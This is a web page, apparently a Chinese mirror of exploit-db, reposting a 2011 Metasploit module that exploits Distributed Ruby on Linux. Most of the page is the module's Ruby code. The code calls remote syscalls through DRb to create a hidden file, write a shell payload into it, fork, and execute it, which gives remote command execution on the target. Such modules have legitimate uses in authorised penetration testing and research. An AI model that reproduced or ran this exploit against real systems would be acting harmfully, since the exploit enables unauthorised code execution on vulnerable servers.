Distributed Ruby – send syscall (Metasploit) - 体验盒子

作者： Metasploit

日期： 2011-03-23

类别：

remote

平台：

linux

来源：https://www.exploit-db.com/exploits/17031/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/projects/Framework/

##

require 'msf/core'

require 'drb/drb'

class Metasploit3 < Msf::Exploit::Remote

def initialize(info = {})

super(update_info(info,

'Name' => 'Distributed Ruby send syscall vulnerability.',

'Description'=> %q{ This module exploits remote syscalls in DRuby

},

'Author' => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],

'License'=> MSF_LICENSE,

'Version'=> '',

'References' =>

[

],

'Privileged' => false,

'Payload'=>

{

'DisableNops' => true,

'Compat'=>

{

'PayloadType' => 'cmd',

},

'Space' => 32768,

},

'Platform' => 'linux',

'Arch' => ARCH_ALL,

'Targets'=> [[ 'Automatic', { }]],

'DefaultTarget' => 0))

register_options(

[

OptString.new('URI', [true, "The druby URI of the target host ", ""]),

], self.class)

end

def exploit

serveruri = datastore['URI']

DRb.start_service

p = DRbObject.new_with_uri(serveruri)

class << p

undef :send

end

filename = "." + Rex::Text.rand_text_alphanumeric(16)

# syscall open

i =p.send(:syscall,8,filename,0700)

#syscall write

p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)

#syscall close

p.send(:syscall,6,i)

#syscall fork

p.send(:syscall,2)

#syscall execve

p.send(:syscall,11,filename,0,0)

handler(nil)

end